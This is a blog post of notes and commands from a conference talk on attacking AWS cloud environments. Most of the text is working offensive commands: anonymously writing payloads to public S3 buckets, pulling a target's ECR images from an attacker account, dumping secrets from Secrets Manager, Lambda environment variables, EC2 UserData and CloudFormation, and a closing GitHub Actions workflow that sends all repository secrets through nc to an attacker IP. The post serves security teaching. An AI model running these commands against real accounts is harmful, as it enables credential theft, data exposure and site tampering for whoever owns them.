Salt Lake City - fwd:cloudsec 2021

The Cloud is Dark and Full of Terrors

This post is the notes and commands from by presentation “The Cloud is Dark and Full of Terrors” from BSides Augusta 2021. Video is available on YouTube. Slides are available here

Authorize global access via RDP to an instance

aws ec2 authorize-security-group-ingress --port 3389 --cidr 0.0.0.0/0 --FIXME

AWS S3 commands

Anonymous list of an S3 bucket:

aws s3 ls $bucket --no-sign-request

curl http://$bucket.s3.amazonaws.com/

Listing an S3 Bucket as any AWS Customer

aws s3 ls $bucket --profile EVILACCOUNT

Download a specific object

curl https://$bucket.s3.amazonaws.com/$key

Anonmyous write to a publicly writable bucket

aws s3 cp --no-sign-request payload.js s3://$bucket/index.js

curl -X PUT -T "payload.js" \
  -H "Host: $bucket.s3.amazonaws.com" \
  -H "x-amz-acl:public-read" \
  "https://$bucket.s3.amazonaws.com/index.js"

Determine the AWS Account ID which owns a bucket

Find S3 Websites you can takeover

LIST=`aws route53 list-hosted-zones --output text --query HostedZones[].Id`
for id in $LIST ; do
  aws route53 list-resource-record-sets --hosted-zone-id $id \
    --query "ResourceRecordSets[].[AliasTarget.DNSName,Name]" \
    --output text | grep s3
done

Public ECR Registry

To Authenticate to a target AWS Account from an attacker account:

ECRPASS=$(aws ecr get-login-password --profile $EVILACCOUNT )
echo $ECRPASS | docker login --username AWS --password-stdin $TARGETACCOUNTID.dkr.ecr.$REGION.amazonaws.com
Login is successful!

List images:

aws ecr list-images --repository-name melisandre --profile $EVILACCOUNT --registry-id $TARGETACCOUNTID

To Exfiltrate the container for local inspection:

docker save $TARGETACCOUNTID.dkr.ecr.$REGION.amazonaws.com/$IMAGE

Policy to make an ECR public:

{
    "Version": "2008-10-17",
    "Statement":
    [
        {
            "Sid": "allow public pull",
            "Effect": "Allow",
            "Principal": "*",
            "Action": ["ecr:*"]
        }
    ]
}

Command to apply the above policy

aws ecr set-repository-policy --repository-name melisandre --policy-text file://ecr-policy.json

How to enumerate ECR Policies:

aws ecr get-repository-policy --registry-id $TARGETACCOUNTID --repository-name melisandre --profile EVILACCOUNT

Public AWS ElasticSearch Clusters

Elastic Search Endpoints look like:

https://$CUSTOMERDEFINED-$RANDOM.us-east-1.es.amazonaws.com/

From an ES perspective, you can Curl the endpoint and see if it responds.

curl https://$ENDPOINT/ | jq .

{ ...
"tagline" : "You Know, for Search"
}

Next get the list of indices to see if anything bad looks like it’s there:

curl https://$ENDPOINT/_aliases?pretty=true

Finally based on that list, you can search an index

curl https://$ENDPOINT/_search?pretty=true

Enumerate Snapshots and AMIs

aws ec2 describe-snapshots --owner-ids $TARGETACCOUNTID --profile $EVILACCOUNT --region $REGION

aws ec2 describe-images --owners $TARGETACCOUNTID --profile $EVILACCOUNT --region $REGION

Secrets Enumeration – EC2 UserData

LIST=`aws ec2 describe-instances \
--query Reservations[].Instances[].InstanceId --output text`
for i in $LIST ; do
  aws ec2 describe-instance-attribute --instance-id $i --attribute userData \
  	--output text --query UserData | base64 --decode > $i-USERDATA.txt
done

Secrets Enumeration – Secrets Manager

LIST=`aws secretsmanager list-secrets
  --query SecretList[].Name --output text`

for secret_name in $LIST; do
  echo "$secret_name: "
  aws secretsmanager get-secret-value --secret-id $secret_name --query SecretString --output text
done

Exfiltrate Lambda Code

LIST=`aws lambda list-functions --query Functions[].FunctionName --output text`
for f in $LIST ; do
  URL=`aws lambda get-function --function-name $f --output text --query Code.Location `
  curl -o $f.zip "$URL"
done

Find Secrets in Lambda Envars!!

LIST=`aws lambda list-functions --query Functions[].FunctionName --output text`
for f in $LIST ; do
  aws lambda get-function --function-name $f --query Configuration.Environment
done

Secrets Enumeration – CloudFormation

aws cloudformation describe-stacks --query Stacks[].Parameters

aws cloudformation describe-stacks --query Stacks[].Outputs

Exfiltrate secrets from GitHub Secrets

name: Action run on a PR
on: [push]
jobs:
  sync-files:
    runs-on: ubuntu-latest
    steps:
    - uses: actions/checkout@v1
    - name: Exposure
      run: |
		echo "here are some sekrets haxored courtesy of $GITHUB_ACTOR: ${{ toJson(secrets) }}" | nc -w 3 <your_ip> 80